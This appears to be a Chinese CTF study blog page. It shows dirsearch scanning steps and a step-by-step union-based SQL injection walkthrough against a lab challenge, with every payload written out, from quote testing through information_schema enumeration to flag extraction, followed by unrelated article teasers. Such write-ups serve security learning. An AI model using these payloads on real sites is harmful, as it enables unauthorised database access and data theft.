ctf中的sql注入
任意檔案讀取漏洞
第一章 web入門
dirsearch安裝
cd /etc掃瞄後,本地+綠色字尾直接開啟得到flag。git clone
cd dirsearch
./dirsearch.py -u 127.0.0.1:80 -e*
拔牙給搞發燒了你敢信,我服了。
這題根據書上來就直接繞暈了。
首先嘗試?id=2-1,發現顯示的是id=2時的頁面,可能是字元型注入,再輸入?id=2a,發現和id=2時的頁面一樣,印證了是字元型注入。接下來就是正常union注入流程了。
一、判斷是否用』做字串引號
?id=1』and 1=1 --+正常顯示證明有引號。
二、判斷它所在的資料庫有幾列
?id=1』order by 3 --+根據回文顯示有3列,再試試把3改4,無回文,證明最大3列。
三、判斷他顯示的內容在資料庫的第幾列
?id=-1』 union select 1,2,3 --+回文顯示資料在第二列及第三列。
四、查詢出當前使用者許可權
?id=-1』 union select 1,user(),3 --+root許可權,無需多言。
五、查詢當前資料庫
?id=-1』 union select 1,database(),3 --+資料庫為note六、查詢note的表名
?id=-1』 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=『note』 --+分為兩個表。
七 、查詢fl4g及notes裡的字段
?id=-1』 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=『fl4g』 --+
?id=-1』 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=『notes』 --+不管notes裡的,直接查fllllag。
八、獲取flag
?id=-1』 union select 1,group_concat(fllllag),3 from fl4g --+結束。
這題考察注入流程,一點點判斷。確定注入型別後直接搜union注入流程走一遍就行了。
這題布置burpsuite與dvwa環境布置了好久,沒有成功,暫時繞過,思路是用dvwa除錯。
從0到1的PostgreSQL轉型之路
postgresql 和 oracle 都是面向企業的高階資料庫,在設計理念 使用方法 功能等各方面有非常多的相通點。那麼作為一名有著多年 oracle 資料庫運維經驗的工程師,如何快速的從零開始來了解並熟練掌握 postgresql呢,完成華麗麗的轉型?本次,我們採訪到了即將在 postgres ...
KAFKA從0到1的高階之路
kafka 詳細介紹 本人也是第一次使用kafka,順便記錄下使用和踩過的坑,望大牛們可以多提意見,what is kafka?使用籠統的說法,訊息中介軟體,可以用來收發訊息的元件,並且具有較好的容錯性。kafka有四個核心的api,producer 生產者,傳送訊息 consumer 消費者,接收...
PM從0到1,應屆生怎麼成長?
有多少人大學的專業跟自己畢業後沒有任何瓜葛。所以小同學,你可以放寬心。保持你的熱愛,持續它。不過想要進入產品經理這個圈子,我們也應該早做準備,而不是讓時間流逝。講一下幾種情況吧。一 你還在學校裡,距離畢業還有1年以上。你還處於這種環境下的話,對於產品經理感興趣,那麼就開始計畫吧 很多人在大一好好學習...